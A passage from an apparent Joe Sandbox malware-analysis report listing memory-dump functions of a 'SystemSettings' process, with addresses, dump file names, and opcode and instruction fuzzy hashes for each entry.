                                                                  • Opcode Fuzzy Hash: f04a3a9aaab5897e0d3df3ef29cec71bdf55dc72cd84540cf5cd5e3c4dead341
                                                                  • Instruction Fuzzy Hash: 8C31603190D68A9FDB46FB64C8599A97BF0EF5A300F0805FBD04AD71E3DB289845C751
                                                                  Function 00007FF848F30998 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 185a5453df2414680ed8bf28231f624fb10a8b31b305b707869614781e21d8e5
                                                                  • Instruction ID: a0e292ff2654e51cb8d9a80f12895208b3e5d850ced94a775e031dba87636edb
                                                                  • Opcode Fuzzy Hash: 185a5453df2414680ed8bf28231f624fb10a8b31b305b707869614781e21d8e5
                                                                  • Instruction Fuzzy Hash: A121D631B1DD195FE788F72D545967936C2EFA9355F1000BAE80EC33D7DE18AC418689
                                                                  Function 00007FF848F623E1 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9d467b9db2134ae50cd356a18115162f3ef1def7589e414d805913c73584ff65
                                                                  • Instruction ID: 3d2f023b2804342c3338557951bf6acf33cebd5ed613e5d27d617af092509c67
                                                                  • Opcode Fuzzy Hash: 9d467b9db2134ae50cd356a18115162f3ef1def7589e414d805913c73584ff65
                                                                  • Instruction Fuzzy Hash: 9521F632E0DA8A5FE785FBAC54963B46A91FF99340F4402BAD40CD31C3DE2C58D6834A
                                                                  Function 00007FF848F30C25 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54a29490b25be4d1f687d85187173f71a11f446f393feb6a85da4fb50b520c7c
                                                                  • Instruction ID: f0fa7df12c5de988e157799f020e772424a9a45317f46197cb7153b8d9332302
                                                                  • Opcode Fuzzy Hash: 54a29490b25be4d1f687d85187173f71a11f446f393feb6a85da4fb50b520c7c
                                                                  • Instruction Fuzzy Hash: 9121E136A0D28ADEE312BB6898511EC7B60EF823A5F1442B3D448CA1C3DB3C6546C799
                                                                  Function 00007FF848F62AAC Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a9275473d2c2e0b45bdee40ee073006fa011f738ce587a70911e4cbd9d6885e
                                                                  • Instruction ID: 9561f0ec1b4e9bb069a102d107cbe71628018342630dbf09bb939088c48354af
                                                                  • Opcode Fuzzy Hash: 4a9275473d2c2e0b45bdee40ee073006fa011f738ce587a70911e4cbd9d6885e
                                                                  • Instruction Fuzzy Hash: 78113D32E0C92A8FE7A9EB58D4557B933A1EB68750F140279D40DE72C6DB78AC438784
                                                                  Function 00007FF848F66F18 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e1e7905532c106fd82661c84aef446e8ba63f27cd2f177eab79d654b95fd6e1b
                                                                  • Instruction ID: eafc81defa1d1f132de05b56ab821d01e5b9b62e20e4865cb7e1ca0c1750c5b4
                                                                  • Opcode Fuzzy Hash: e1e7905532c106fd82661c84aef446e8ba63f27cd2f177eab79d654b95fd6e1b
                                                                  • Instruction Fuzzy Hash: 7C01FC17A1F55259D704B27D74564F93B90DF412BEF0843B7E14CCD083EE1C548A82A8
                                                                  Function 00007FF848F31996 Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0177b27e6d1d6d2e01c6123903a31cef011e54f0d8477361e0bdd715d9eb0eb4
                                                                  • Instruction ID: ec756037848980c18fea1e4f06b2d5858bfdd01ad1dcee803d84f6de0d14b356
                                                                  • Opcode Fuzzy Hash: 0177b27e6d1d6d2e01c6123903a31cef011e54f0d8477361e0bdd715d9eb0eb4
                                                                  • Instruction Fuzzy Hash: 5E110031E0C80A8FEB94FB28C8556B83392AF94351F1541B7D44DD72D2EE28A9C18B48
                                                                  Function 00007FF848F30C38 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f8a9f341fe8218e3760f55c97f3bff96735b74ee7a2d60fad55703c77019937
                                                                  • Instruction ID: 3a71bb314679097b5dec2c4f2855fe352caf3c425d435c68a085d6fca8e973f6
                                                                  • Opcode Fuzzy Hash: 0f8a9f341fe8218e3760f55c97f3bff96735b74ee7a2d60fad55703c77019937
                                                                  • Instruction Fuzzy Hash: 6411A031E0D68D8FE702FB7898411AC7BB0EF82390F1546F7C844DB2D2DA3855458785
                                                                  Function 00007FF848F45CD5 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f40000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: efdb8d5751f5609fe10e8a8e81bdb3bb83c9982d870ef0c0942069361ad72c15
                                                                  • Instruction ID: 787f1b183339f397ddad15c61d6073518a79e6530659fd88d20dff03b8d09153
                                                                  • Opcode Fuzzy Hash: efdb8d5751f5609fe10e8a8e81bdb3bb83c9982d870ef0c0942069361ad72c15
                                                                  • Instruction Fuzzy Hash: 42115474E0C6198FDBD5FB08C884659B3B6FFA8B10F1042A5D04CD3289CA30AE818B44
                                                                  Function 00007FF848F30C40 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee887375ce99bde7207ffd9602e04b0424bcdae5f5b49929560317fbb454ad21
                                                                  • Instruction ID: 5cf12bb5952646474ec6225339484417acfc79aea519d1a6811fbc1f87a7dc1f
                                                                  • Opcode Fuzzy Hash: ee887375ce99bde7207ffd9602e04b0424bcdae5f5b49929560317fbb454ad21
                                                                  • Instruction Fuzzy Hash: 57118B31E0D6898FE702FB6898500AD7BB0EF82390F1541F7D844DB2D2DA386549CB85
                                                                  Function 00007FF848F3190D Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05a9d6eb68c0afeda28549dd331f9d198dbf27536d53e0cb9af3d2339b72710d
                                                                  • Instruction ID: c0d8a9ea79e3b1e6d03bb995c6e5e82d957d50c6dd058d0c4f8a482d2288db3d
                                                                  • Opcode Fuzzy Hash: 05a9d6eb68c0afeda28549dd331f9d198dbf27536d53e0cb9af3d2339b72710d
                                                                  • Instruction Fuzzy Hash: 51018031E0D81B8FE7E4FB1888143BD6292AF94391F1502B7E41DD32D2EF386D858648
                                                                  Function 00007FF848F6D83B Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3321795314b5a6215241eed69e92f20ce353d9aebe458389556ae1c7cc63962f
                                                                  • Instruction ID: b1199123e112a7abddb05e27b7fe74176ad5d922da7f03015d3470e2e30209cf
                                                                  • Opcode Fuzzy Hash: 3321795314b5a6215241eed69e92f20ce353d9aebe458389556ae1c7cc63962f
                                                                  • Instruction Fuzzy Hash: FB01B131F0840A8EEB58F62898493BD73A2EFE4351F149235C018A71C5CF3A58478B84
                                                                  Function 00007FF848F35A29 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7d15db34fc16f37fa3072931ac75a85ea33950464a1e815c60b861a04884c2c
                                                                  • Instruction ID: cce8cfbb3fba70f40f7e005554674a2052d95b8de3b34466b97c1f5b594c7f16
                                                                  • Opcode Fuzzy Hash: f7d15db34fc16f37fa3072931ac75a85ea33950464a1e815c60b861a04884c2c
                                                                  • Instruction Fuzzy Hash: E6018431508A4ACFCB55EF08C890BA977F1FBA8314F0502AAD40DD72A1DB34EA40DF40
                                                                  Function 00007FF848F30C50 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2134e99541dd5352bd2f6c08102de2120707b3de43a6d10785432f5e6c056388
                                                                  • Instruction ID: ee7bac50d780a4a12b916f83b6fcd893ff8188c2b0b24ea6372c7eac7556f265
                                                                  • Opcode Fuzzy Hash: 2134e99541dd5352bd2f6c08102de2120707b3de43a6d10785432f5e6c056388
                                                                  • Instruction Fuzzy Hash: FD011630D0D2899FE716FB6488541AD7FB0EF86394F1941F7D844DB2D2DA38AA44C785
                                                                  Function 00007FF848F6AE23 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 446411d97e5b4338f4b01dd4fb29434c3b79b212f75fe54013d5b0b1751e2789
                                                                  • Instruction ID: 6672c8683ea0cfcc908f327f6bc6f864b1003278278d1f5ff0e1e79ebc43e474
                                                                  • Opcode Fuzzy Hash: 446411d97e5b4338f4b01dd4fb29434c3b79b212f75fe54013d5b0b1751e2789
                                                                  • Instruction Fuzzy Hash: 31F09031E1C94A8EE685FB29448A3B873D1FF68744F5012B5D40CD32C3DF2C98828745
                                                                  Function 00007FF848F6AAA9 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ad66ffca41f7e71f155b84d3ac5f62a0f224d0f0dfcb05408bab969f103e13e7
                                                                  • Instruction ID: 72dd0c875c2ce82a46c0aa7fe4b19e2be58e6bb2b06219c2852aced195dfa25b
                                                                  • Opcode Fuzzy Hash: ad66ffca41f7e71f155b84d3ac5f62a0f224d0f0dfcb05408bab969f103e13e7
                                                                  • Instruction Fuzzy Hash: 16F0A021B1CBC44FD72A96395865061BFE1DF9B50274A12EFC096C72E3ED58EC86C741
                                                                  Function 00007FF848F30BB5 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction ID: 2f40d33765d1bbc83eeefacfd4ba60ea863b9e80c47ded62625a5ad1b7144920
                                                                  • Opcode Fuzzy Hash: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction Fuzzy Hash: 12F0E530E5E54A4FEA407338D8D24A87F60EF4B210FC504F3D488C60D2EA49589A8316
                                                                  Function 00007FF848F30B77 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a60203e813ceb39d3c82471d84d4f87af386272471654d4b582eb302ad88453c
                                                                  • Instruction ID: 70a3877ed62bfb3509e2ab12c23e84a1e87069f32e3b9ef7c5a6c927a5cc40be
                                                                  • Opcode Fuzzy Hash: a60203e813ceb39d3c82471d84d4f87af386272471654d4b582eb302ad88453c
                                                                  • Instruction Fuzzy Hash: 42F0553560E589CFDB80AB38ECA04E4BB60FF03209B5616EAD088C3092D2524409C700
                                                                  Function 00007FF848F319C3 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction ID: 8042e034695f520ab9c6597f4a519c9ba2bd530793a653c8d701b07bd4bf5608
                                                                  • Opcode Fuzzy Hash: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction Fuzzy Hash: 58F03C30E0C81A8FEBA4FB14CC546F873A1EB90392F1401B7D04E932E5DE3869C68B48
                                                                  Function 00007FF848F44AF1 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f40000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5fb33072080be913be9d42331943476139b32ac1f4d870900f479b25c5f3ffee
                                                                  • Instruction ID: 0c485d6765ab88014a6037399d4770efe4abfd811bd7f5d067b1c8a09bce2246
                                                                  • Opcode Fuzzy Hash: 5fb33072080be913be9d42331943476139b32ac1f4d870900f479b25c5f3ffee
                                                                  • Instruction Fuzzy Hash: CBF05E31E0E5174FE619BB0CA4406B93290EF35798F144177D44EF31D7DF28A8029699
                                                                  Function 00007FF848F679ED Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5943ef0818284c397c42a77bd77afce88870ad6e93d1216e3bac76002c181dd9
                                                                  • Instruction ID: 8e33a0c3ee8f2c9ae11a7fc0aca886820a7462a7c5cad48c0cb011f5f52cfe5e
                                                                  • Opcode Fuzzy Hash: 5943ef0818284c397c42a77bd77afce88870ad6e93d1216e3bac76002c181dd9
                                                                  • Instruction Fuzzy Hash: FFF0F220A4E7C20FC30B573848654603FB09E2725179A05EBD08ACF5F3D9199C9AC362
                                                                  Function 00007FF848F493CA Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f40000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e01b4ada8c608f80bb3498e62d591dcd37b007bae89a79accfa86a0e010f1890
                                                                  • Instruction ID: 2f0a27bd15418f175b1ebc27bb18821d1c2f14ea7d30d0ffec41d5b833766ef6
                                                                  • Opcode Fuzzy Hash: e01b4ada8c608f80bb3498e62d591dcd37b007bae89a79accfa86a0e010f1890
                                                                  • Instruction Fuzzy Hash: CBF06C35E0C81D8FE685FB18845537D62A2FF98340F4401F6D80DE32D6CE28BC414B55
                                                                  Function 00007FF848F361A2 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction ID: 41e640aa316bf1bb5b6a77aa7f054218c07d893dc2d367c08d0827aa9a49684e
                                                                  • Opcode Fuzzy Hash: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction Fuzzy Hash: CCF03934D0C1168FF7A4A294D4513AAA3A0EB84350F1410BAE90EA33C2DE3CAE818B19
                                                                  Function 00007FF848F679B9 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43ef69cfe2cd081bc163f14d1298855fb808042f6bd2c2ef56c820eb5dbd446b
                                                                  • Instruction ID: d400a898ee4f823b8584397bd0e96f09974623007ee80b9e0da49b6abdae0da8
                                                                  • Opcode Fuzzy Hash: 43ef69cfe2cd081bc163f14d1298855fb808042f6bd2c2ef56c820eb5dbd446b
                                                                  • Instruction Fuzzy Hash: D8E04F21A897800FC30A663488658543FB0DF6B215B4A00D7D045CF1B3D61DDC49C711
                                                                  Function 00007FF848F45350 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f40000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf526c727a200d67b7dc7eb06edb6a6cb44d31c04c12d85fe8f15c5aae398ef4
                                                                  • Instruction ID: 4394f6fdf20c0ca82ce6797b43662ed7790c02370eb58351bc7aa08844519489
                                                                  • Opcode Fuzzy Hash: bf526c727a200d67b7dc7eb06edb6a6cb44d31c04c12d85fe8f15c5aae398ef4
                                                                  • Instruction Fuzzy Hash: 04D05E30B609494BCB0CB62D8458430F3D1E7AA21A7D45278940BC2281ED29ECC68B84
                                                                  Function 00007FF848F6DA99 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd4437a3c26606ce36f4605a7d7bbe911869ce1ee1e19c70acd622214e478a0e
                                                                  • Instruction ID: 5cd17015a6b4104e5cae87253162adf2d9a25b1ecd5f4e0bb2854229b0714809
                                                                  • Opcode Fuzzy Hash: bd4437a3c26606ce36f4605a7d7bbe911869ce1ee1e19c70acd622214e478a0e
                                                                  • Instruction Fuzzy Hash: 70E01A7294E7C04FC70BAB3488A99503F70EE6721074A55EEC045CF1A3E619884AC701
                                                                  Function 00007FF848F48868 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f40000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction ID: ad7d8d11ea62537b8ed61d786669e0d057a809d108540207a386bbb4c775015f
                                                                  • Opcode Fuzzy Hash: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction Fuzzy Hash: 99E09231D0C4068FF700BB50C4046E872049F11394F0942B68C0CAB2D3DF5C694847C5
                                                                  Function 00007FF848F6A610 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F6A580 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F6DA19 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6056958181af99d3bf80f548bfcaaa55ca6658d4ac86c10ff2831bdf5bd8294
                                                                  • Instruction ID: 6c421da079e48881c90247af84d89097529c9350f51e9a91ba401aa4feeb1982
                                                                  • Opcode Fuzzy Hash: b6056958181af99d3bf80f548bfcaaa55ca6658d4ac86c10ff2831bdf5bd8294
                                                                  • Instruction Fuzzy Hash: 8EE01A2194E7C08FC70B973588698507F60DE2721074E41EEC185CF1A3D6198849C701
                                                                  Function 00007FF848F623C0 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                  Function 00007FF848F6B890 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
